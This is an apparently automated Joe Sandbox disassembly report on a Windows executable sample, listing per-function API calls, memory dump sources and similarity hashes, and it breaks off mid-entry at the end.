Instruction Fuzzy Hash: AA81B37090424D9FCF11EF65C8417EFBBB4AF4934AF1480AAE84067392D3399B4ACB58

Function 0047C9AC Relevance: 3.2, APIs: 2, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22

Part of subcall function 0042E244: 73A1A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
Part of subcall function 0042E244: 73A1A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296

SendNotifyMessageA.USER32(0001043A,00000496,00002711,-00000001), ref: 0047CBF2

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: A480A570EnumFontsMessageNotifySend
String ID:
API String ID: 2685184028-0
Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E

Function 0042DB28 Relevance: 3.1, APIs: 2, Instructions: 113registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95

Function 0042DDE8 Relevance: 3.1, APIs: 2, Instructions: 111registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CloseEnum
String ID:
API String ID: 2818636725-0
Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19

Function 0045CF00 Relevance: 3.1, APIs: 2, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AllocDecompressInitVirtualZ2_bz
String ID:
API String ID: 3582128297-0
Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8

Function 0040AFD8 Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Resource$FindFree
String ID:
API String ID: 4097029671-0
Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD

Function 004522E0 Relevance: 3.0, APIs: 2, Instructions: 48fileCOMMON

Download Yara Rule

APIs

MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorFileLastMove
String ID:
API String ID: 55378915-0
Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598

Function 00451DD0 Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598

Function 00451F68 Relevance: 3.0, APIs: 2, Instructions: 42fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DeleteErrorFileLast
String ID:
API String ID: 2018770650-0
Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598

Function 00452140 Relevance: 3.0, APIs: 2, Instructions: 41COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588

Function 0045CFF4 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046

Strings

bzlib: Too much memory requested, xrefs: 0045D021

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: AllocVirtual
String ID: bzlib: Too much memory requested
API String ID: 4275171209-1500031545
Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C

Function 0042324C Relevance: 3.0, APIs: 2, Instructions: 35COMMON

Download Yara Rule

APIs

LoadCursorA.USER32(00000000,00007F00), ref: 00423259
LoadCursorA.USER32(00000000,00000000), ref: 00423283

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: CursorLoad
String ID:
API String ID: 3238433803-0
Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D

Function 0042E2BC Relevance: 3.0, APIs: 2, Instructions: 33libraryCOMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLibraryLoadMode
String ID:
API String ID: 2987862817-0
Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928

Function 0044FF58 Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76

Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: ErrorLast$FilePointer
String ID:
API String ID: 1156039329-0
Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65

Function 00406274 Relevance: 3.0, APIs: 2, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32 ref: 00406276
GlobalLock.KERNEL32(00000000), ref: 0040627C

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Global$AllocLock
String ID:
API String ID: 15508794-0
Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C

Function 004014E4 Relevance: 2.5, APIs: 2, Instructions: 37memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9

Function 004085E4 Relevance: 1.6, APIs: 1, Instructions: 99COMMON

Download Yara Rule

APIs

GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603

Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11

Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: DefaultInfoLoadLocaleStringSystem
String ID:
API String ID: 1658689577-0
Opcode ID: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
Instruction ID: 93f846491c188cfa0342f854d2ed9f3c57c1d7a82097d89a8732084db8b3b420
Opcode Fuzzy Hash: 0c0846f6018fb18ca9a233b5544f45ce7783ff452534d63f167772a199f0b751
Instruction Fuzzy Hash: 11314375E001199BCF00DF95C8819DEB7B9FF84314F15857BE815AB286E738AE058B98

Function 0041FBAC Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

SetScrollInfo.USER32(00000000,?,?,00000001), ref: 0041FC49

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: InfoScroll
String ID:
API String ID: 629608716-0
Opcode ID: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
Instruction ID: 2c7078d87c5cd90d2d28a279248f0ceb63a34b6d02ec849610dd04de18f9c6e3
Opcode Fuzzy Hash: cabb8c3e19a8a88e92d5d776e573f6eee413a8791bccb1521323fae2b782b601
Instruction Fuzzy Hash: AA213EB1608745AFD350DF39D4407AABBE4BB48314F04893EA498C3741E778E99ACBD6

Function 0046B4C8 Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

Part of subcall function 0041EEB4: GetCurrentThreadId.KERNEL32 ref: 0041EF03
Part of subcall function 0041EEB4: 73A25940.USER32(00000000,0041EE64,00000000,00000000,0041EF20,?,00000000,0041EF57,?,0042ED24,?,00000001), ref: 0041EF09

SHPathPrepareForWriteA.SHELL32(00000000,00000000,00000000,00000000,00000000,0046B526,?,00000000,?,?,0046B733,?,00000000,0046B772), ref: 0046B50A

Part of subcall function 0041EF68: IsWindow.USER32(?), ref: 0041EF76
Part of subcall function 0041EF68: EnableWindow.USER32(?,00000001), ref: 0041EF85

Memory Dump Source

Source File: 00000001.00000002.2944244420.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2944210596.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944356250.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944382116.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944411455.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2944444055.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Mg5bMQ2lWi.jbxd

Similarity

API ID: Window$A25940CurrentEnablePathPrepareThreadWrite
String ID:
API String ID: 390483697-0
Opcode ID: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
Instruction ID: 01ed1b7c575f4ace7d1103a0bc1ae6f252d8ead66db9bed0bf215ba1be387fc5
Opcode Fuzzy Hash: a542d2fe0218e89889f5f5091b901710e807ef3ef5334a09fe7f4d59435151a3
Instruction Fuzzy Hash: 09F059B0244300BFE7109B32FC16B6677E8D709708F90443BF400C25C0E3794880C9AE

Function 00440BE8 Relevance: 1.5, APIs: 1, Instructions: 36fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE ref: 00440BFF

Memory Dump Source

